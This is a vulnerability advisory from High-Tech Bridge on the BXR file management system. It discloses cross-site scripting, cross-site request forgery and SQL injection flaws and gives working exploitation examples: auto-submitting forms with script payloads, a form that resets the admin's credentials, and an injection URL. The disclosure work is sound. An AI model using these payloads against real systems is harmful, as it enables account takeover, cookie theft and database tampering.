High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in BXR which could be exploited to perform cross-site scripting, cross-site request forgery and SQL injection attacks.
Cross-site scripting (XSS) vulnerability in BXR
1.1 The vulnerability exists due to input sanitation error in the “setting[site_title]” parameter in /settings/update_settings/. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in users browser in context of the vulnerable website. Exploitation example: <form action="http://host/settings/update_settings" method="post" name="main" > <input type="hidden" name="setting[site_title]" value='BXR File Management System"><script>alert(document.cookie)</script>' /> <input type="hidden" name="setting[site_keywords]" value="BXR, Open Source File Management System" /> <input type="hidden" name="setting[site_description]" value="The Free, Open Source, Ruby on Rails File Management System." /> <input type="hidden" name="setting[let_users_change_default_folder]" value="0" /> <input type="hidden" name="setting[use_ferret]" value="0" /> <input type="hidden" name="setting[overwrite_existing_files]" value="0" /> <input type="hidden" name="commit" value="Update Settings" /> </form> <script> document.main.submit(); </script> 1.2 The vulnerability exists due to input sanitation error in the "search[query]" parameter in /search/show_results /. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user
s browser in context of the vulnerable website.
Exploitation example:
<form action=“http://host/search/show_results” method=“post” name=“main” >
<input type=“hidden” name=“search_type” value=“filename” />
<input type=“hidden” name=“search[query]” value=‘1"><script>alert(document.cookie)</script>’ />
<input type=“hidden” name=“commit” value=“Find!” />
</form>
<script>
document.main.submit();
</script>
1.3 The vulnerability exists due to input sanitation error in the “tag_1” parameter in /file/do_the_upload/. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Cross-site request forgery in BXR
The vulnerability exists due to insufficient validation of the request origin in user/update/. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change the administrator`s credentials.
Exploitation example:
<form action=“http://host/user/update/1” method=“post” name=“main” >
<input type=“hidden” name=“user[name]” value=“admin” />
<input type=“hidden” name=“user[email]” value="[email protected]" />
<input type=“hidden” name=“user[password]” value=“123” />
<input type=“hidden” name=“user[password_confirmation]” value=“123” />
<input type=“hidden” name=“belongs_to_group[1]” value=“yes” />
<input type=“hidden” name=“user[default_folder_id]” value=“1” />
<input type=“hidden” name=“commit” value=“Save” />
</form>
<script>
document.main.submit();
</script>
SQL injection vulnerability in BXR: CVE-2010-4963
The vulnerability exists due to input sanitation errors in the “order_by” parameter in /folder/list. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application`s database. Successful exploitation may allow an attacker to read, modify, add or delete arbitrary data in the database.
Exploitation example:
http://host/folder/list?order_by=filesize’+SQL